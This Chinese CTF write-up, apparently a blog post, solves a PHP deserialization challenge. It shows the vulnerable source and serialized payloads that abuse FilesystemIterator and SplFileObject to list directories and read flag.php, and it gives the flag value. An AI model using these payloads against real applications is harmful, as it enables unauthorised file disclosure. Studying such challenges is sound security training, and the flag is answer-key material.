【web]-反序列化-easy ? not easy

打开后看到源码

php 复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}


if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
else{
    $a=new A;

} hello ctfer

分析源码只看到__wakeup函数,其他类没有什么可以利用的,起点、终点、跳板不管用了。只能用php原生态类来输出文件列表读取文件(而且过滤了一些特殊符号,命令通配符等,包含数字字母\,也只能用路径了),代替命令执行。最终的目的也是读取文件获取内容哦。

FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容,按行读取,跨行需要遍历
DirectoryIterator 遍历目录 直接echo会输出目录下的

读取一下目录/var/www/html

php 复制代码
<?php
class A{
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html';
	public $check;
}
$a =  new A();
echo serialize($a);
?>


O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

输出目录:1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE

继续构造

php 复制代码
<?php
class A{
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE';
	public $check;
}
$a =  new A();
echo serialize($a);
?>

O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

显示 flag.php,接下来就要读取内容

php 复制代码
<?php
class A{
	public $class = 'SplFileObject ';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
	public $check;
}
$a =  new A();
echo serialize($a);
?>


O:1:"A":3:{s:5:"class";s:14:"SplFileObject ";s:4:"para";s:56:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";s:5:"check";N;}

输入后得到结果:aced3598a34a561715dacfe32a328c1c

相关推荐
大Mod_abfun6 天前
VB.net序列化和反序列化的使用方法和实用场景
序列化·vb.net·反序列化
不吃肘击7 天前
SpringMVC中自定义消息转换器处理响应和请求时的Json数据序列化的格式
java·spring·json·序列化·反序列化·消息转换器
SuperherRo19 天前
Web开发-JavaEE应用&原生和FastJson反序列化&URLDNS链&JDBC链&Gadget手搓
java·java-ee·jdbc·fastjson·反序列化·urldns
ALe要立志成为web糕手25 天前
PHP反序列化
web安全·网络安全·php·反序列化
白初&3 个月前
shiro代码层面追踪
java·shiro·代码审计·反序列化
脸红ฅฅ*的思春期3 个月前
JAVA安全—Shiro反序列化&DNS利用链&CC利用链&AES动态调试
java·安全·shiro·反序列化
脸红ฅฅ*的思春期3 个月前
JAVA安全—反射机制&攻击链&类对象&成员变量方法&构造方法
反序列化·反射机制·java安全·链条构造
大数据张老师4 个月前
使用Python pickle模块进行序列化
服务器·python·php·序列化·反序列化
脸红ฅฅ*的思春期5 个月前
Java安全—原生反序列化&重写方法&链条分析&触发类
java·安全·序列化·反序列化
是乙太呀5 个月前
php反序列化1_常见php序列化的CTF考题
开发语言·web安全·渗透测试·php·ctf·反序列化